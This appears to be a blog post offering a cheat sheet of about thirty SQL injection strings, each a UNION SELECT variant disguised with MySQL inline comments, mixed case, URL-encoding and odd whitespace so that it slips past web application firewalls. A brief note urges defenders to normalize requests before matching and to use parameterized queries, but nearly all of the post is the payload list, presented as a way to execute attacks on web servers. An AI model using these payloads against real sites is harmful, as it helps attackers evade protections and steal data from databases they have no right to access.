Hello Friends,
While doing research I found some interesting material: a cheat sheet of WAF bypass strings.
The following are ways to bypass a Web Application Firewall and successfully execute the payload on the web server.
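Note: Web admins and WAF analysts should write their signatures and payload parsing in such a way that the following payloads are blocked as well. The variants below differ from a plain UNION SELECT only in comments, letter case, URL-encoding and whitespace, so signatures need to be matched after the request has been decoded and normalized; a rule that looks for the literal keywords in the raw request will miss them. The application itself should also use parameterized queries instead of relying on the WAF alone.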
They are as follows:
/**//*!12345UNION SELECT*//**/
/**//*!50000UNION SELECT*//**/
/**/UNION/**//*!50000SELECT*//**/
REVERSE(noinu)+REVERSE(tceles)
/*!50000UniON SeLeCt*/
union /*!50000%53elect*/
/*!%55NiOn*/ /*!%53eLEct*/
%55nion(%53elect 1,2,3)-- -
+union+distinct+select+
+union+distinctROW+select+
+#uNiOn+#sEleCt
+#1q%0AuNiOn all#qa%0A#%0AsEleCt
/*!%55NiOn*/ /*!%53eLEct*/
union+/*!select*/
/*--*/union/*--*/select/*--*/
union (/*!/**/ SeleCT */ 1,2,3)
/*!union*/+/*!select*/
/**/union/**/select/**/
/**/uNIon/**/sEleCt/**/
/**//*!union*//**//*!select*//**/
/*!uNIOn*/ /*!SelECt*/
+union+distinct+select+
+union+distinctROW+select+
/*!u%6eion*/ /*!se%6cect*/
+un/**/ion+se/**/lect
uni%0bon+se%0blect
%2f**%2funion%2f**%2fselect
union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
Your comments encourage me to keep posting articles like this, so keep commenting and sharing.